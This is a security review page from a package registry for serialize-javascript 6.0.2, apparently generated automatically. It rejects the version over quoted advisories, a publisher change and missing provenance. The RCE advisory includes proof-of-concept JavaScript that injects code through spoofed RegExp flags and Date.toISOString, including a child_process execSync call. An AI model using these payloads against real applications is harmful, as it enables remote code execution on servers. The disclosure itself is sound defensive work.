[email protected] rejected Risk: 100 BSD-3-Clause 2024-01-09

serialize-javascript @6.0.2

rejected

This version was rejected. It did not pass GreenFlagged's security review and is not served by the registry. The findings and risk dispositions below explain why.

npm Repository Homepage Tarball

100

Risk Score

BSD-3-Clause

License

Install Scripts

Dependencies

Dev Dependencies

6.2 KB

Package Size

2024-01-09

Published

Serialize JavaScript to a superset of JSON that includes regular expressions and functions.

Maintainers

okuryuericfredonkulus

Keywords

serializeserializationjavascriptjsjson

Dependencies (1)

Package	Constraint	Registry Status
randombytes	^2.1.0	auto_approved

Dev Dependencies (4)

Package	Constraint	Registry Status
nyc	^15.0.0	auto_approved
chai	^4.1.0	auto_approved
mocha	^10.0.0	auto_approved
benchmark	^2.1.4	auto_approved

Transitive Dependency Tree

2 transitive deps max depth 2

├─ randombytes ^2.1.0 → 2.1.0

├─ safe-buffer ^5.1.0 → 5.2.1

Changes from v5.0.1

No metadata changes detected.

File Changes

0 added 0 removed 3 modified size delta: +.3 KB

Risk Dispositions (2 applicable to this version, 1 other)

Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.

Rule	Source	Disposition	Author	Reason
`osv:GHSA-5c6j-r48x-rmvq`	osv	reject	AI	AI (osv): RCE vulnerability (CVSS 8.1) affecting versions <= 7.0.2; fixed in 7.0.3. Verdict generalizes to all affected versions.
`osv:GHSA-qj8w-gfj5-8c6v`	osv	reject	AI	AI (osv): DoS vulnerability (CVSS 5.9) affecting < 7.0.5; fixed in 7.0.5. Verdict generalizes to all affected versions.

Show 1 disposition(s) that do not match any finding on this version

Rule	Source	Disposition	Author	Reason
`osv:GHSA-76p7-773f-r4q5`	osv	reject	AI	AI (osv): XSS vulnerability (CVSS 5.4) affecting >= 6.0.0, < 6.0.2; fixed in 6.0.2. Verdict generalizes to affected range.

SAST Findings (4)

CRITICAL GHSA-5c6j-r48x-rmvq: Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString() osv

[Always reject] CVSS 8.1 (HIGH) — CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H ### Impact The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660. While `RegExp.source` is sanitized, `RegExp.flags` is interpolated directly into the generated output without escaping. A similar issue exists in `Date.prototype.toISOString()`. If an attacker can control the input object passed to `serialize()`, they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via `eval`, `new Function`, or `<script>` tags), the injected code executes. ```javascript const serialize = require('serialize-javascript'); // Create an object that passes instanceof RegExp with a spoofed .flags const fakeRegex = Object.create(RegExp.prototype); Object.defineProperty(fakeRegex, 'source', { get: () => 'x' }); Object.defineProperty(fakeRegex, 'flags', { get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"' }); fakeRegex.toJSON = function() { return '@placeholder'; }; const output = serialize({ re: fakeRegex }); // Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")} let obj; eval('obj = ' + output); console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed! #h2. PoC 2: Code Injection via Date.toISOString() ``` ```javascript const serialize = require('serialize-javascript'); const fakeDate = Object.create(Date.prototype); fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; }; fakeDate.toJSON = function() { return '2024-01-01'; }; const output = serialize({ d: fakeDate }); // Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")} eval('obj = ' + output); console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed! #h2. PoC 3: Remote Code Execution ``` ```javascript const serialize = require('serialize-javascript'); const rceRegex = Object.create(RegExp.prototype); Object.defineProperty(rceRegex, 'source', { get: () => 'x' }); Object.defineProperty(rceRegex, 'flags', { get: () => '"+require("child_process").execSync("id").toString()+"' }); rceRegex.toJSON = function() { return '@rce'; }; const output = serialize({ re: rceRegex }); // Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")} // When eval'd on a Node.js server, executes the "id" system command ``` ### Patches The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3

CRITICAL GHSA-qj8w-gfj5-8c6v: Serialize JavaScript has CPU Exhaustion Denial of Service via crafted array-like objects osv

[Always reject] CVSS 5.9 (MEDIUM) — CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H ### Impact **What kind of vulnerability is it?** It is a **Denial of Service (DoS)** vulnerability caused by CPU exhaustion. When serializing a specially crafted "array-like" object (an object that inherits from `Array.prototype` but has a very large `length` property), the process enters an intensive loop that consumes 100% CPU and hangs indefinitely. **Who is impacted?** Applications that use `serialize-javascript` to serialize untrusted or user-controlled objects are at risk. While direct exploitation is difficult, it becomes a high-priority threat if the application is also vulnerable to **Prototype Pollution** or handles untrusted data via **YAML Deserialization**, as these could be used to inject the malicious object. ### Patches **Has the problem been patched?** Yes, the issue has been patched by replacing `instanceof Array` checks with `Array.isArray()` and using `Object.keys()` for sparse array detection. **What versions should users upgrade to?** Users should upgrade to **`v7.0.5`** or later. ### Workarounds **Is there a way for users to fix or remediate the vulnerability without upgrading?** There is no direct code-level workaround within the library itself. However, users can mitigate the risk by: * Validating and sanitizing all input before passing it to the `serialize()` function. * Ensuring the environment is protected against Prototype Pollution. * Upgrading to **`v7.0.5`** as soon as possible. ### Acknowledgements Serialize JavaScript thanks **Tomer Aberbach** (@TomerAberbach) for discovering and privately disclosing this issue.

HIGH Publisher changed: okuryu → redonkulus (on 2024-01-09) provenance

This version was published by a different npm account than previous versions on 2024-01-09. This could indicate a legitimate maintainer transition or an account compromise.

LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

Review Summary

Risk score: 100 (capped from 108). Findings: 2 critical (+80), 1 high (+25), 1 low (+3).

Commit: b71ec23841d7 Browse source

Published to npm: 2024-01-09